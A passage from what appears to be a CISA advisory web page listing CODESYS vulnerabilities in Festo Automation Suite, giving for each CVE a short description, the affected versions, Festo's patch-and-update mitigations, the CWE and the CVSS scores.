<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-9011</a></h3>
<div class="csaf-accordion-content">
<p>In Pilz PMC programming tool 3.x before 3.5.17 (based on CODESYS Development System), an attacker can identify valid usernames.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-9011">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/668.html">CWE-668 Exposure of Resource to Wrong Sphere</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-9012</a></h3>
<div class="csaf-accordion-content">
<p>An issue was discovered in 3S-Smart CODESYS V3 products. A crafted communication request may cause uncontrolled memory allocations in the affected CODESYS products and may result in a denial-of-service condition. All variants of the following CODESYS V3 products in all versions prior to v3.5.14.20 that contain the CmpGateway component are affected, regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control V3 Runtime System Toolkit, CODESYS Gateway V3, CODESYS V3 Development System.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-9012">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/770.html">CWE-770 Allocation of Resources Without Limits or Throttling</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2019-9013</a></h3>
<div class="csaf-accordion-content">
<p>An issue was discovered in 3S-Smart CODESYS V3 products. The application may utilize non-TLS based encryption, which results in user credentials being insufficiently protected during transport. All variants of the following CODESYS V3 products in all versions containing the CmpUserMgr component are affected regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (also part of the CODESYS Development System setup), CODESYS V3 Simulation Runtime (part of the CODESYS Development System), CODESYS Control V3 Runtime System Toolkit, CODESYS HMI V3.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2019-9013">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/327.html">CWE-327 Use of a Broken or Risky Cryptographic Algorithm</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-10245</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS V3 web server before 3.5.15.40, as used in CODESYS Control runtime systems, has a buffer overflow.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-10245">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-12067</a></h3>
<div class="csaf-accordion-content">
<p>In Pilz PMC programming tool 3.x before 3.5.17 (based on CODESYS Development System), a user's password may be changed by an attacker without knowledge of the current password.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-12067">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/640.html">CWE-640 Weak Password Recovery Mechanism for Forgotten Password</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-12068</a></h3>
<div class="csaf-accordion-content">
<p>An issue was discovered in CODESYS Development System before 3.5.16.0. CODESYS WebVisu and CODESYS Remote TargetVisu are susceptible to privilege escalation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-12068">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/269.html">CWE-269 Improper Privilege Management</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-12069</a></h3>
<div class="csaf-accordion-content">
<p>In CODESYS V3 products in all versions prior V3.5.16.0 containing the CmpUserMgr, the CODESYS Control runtime system stores the online communication passwords using a weak hashing algorithm. This can be used by a local attacker with low privileges to gain full control of the device.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-12069">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/916.html">CWE-916 Use of Password Hash With Insufficient Computational Effort</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-14509</a></h3>
<div class="csaf-accordion-content">
<p>Multiple memory corruption vulnerabilities exist in CodeMeter (All versions prior to 7.10) where the packet parser mechanism does not verify length fields. An attacker could send specially crafted packets to exploit these vulnerabilities.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-14509">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:<br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:<br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/805.html">CWE-805 Buffer Access with Incorrect Length Value</a></p>
<hr>
<h4>Metrics</h4>
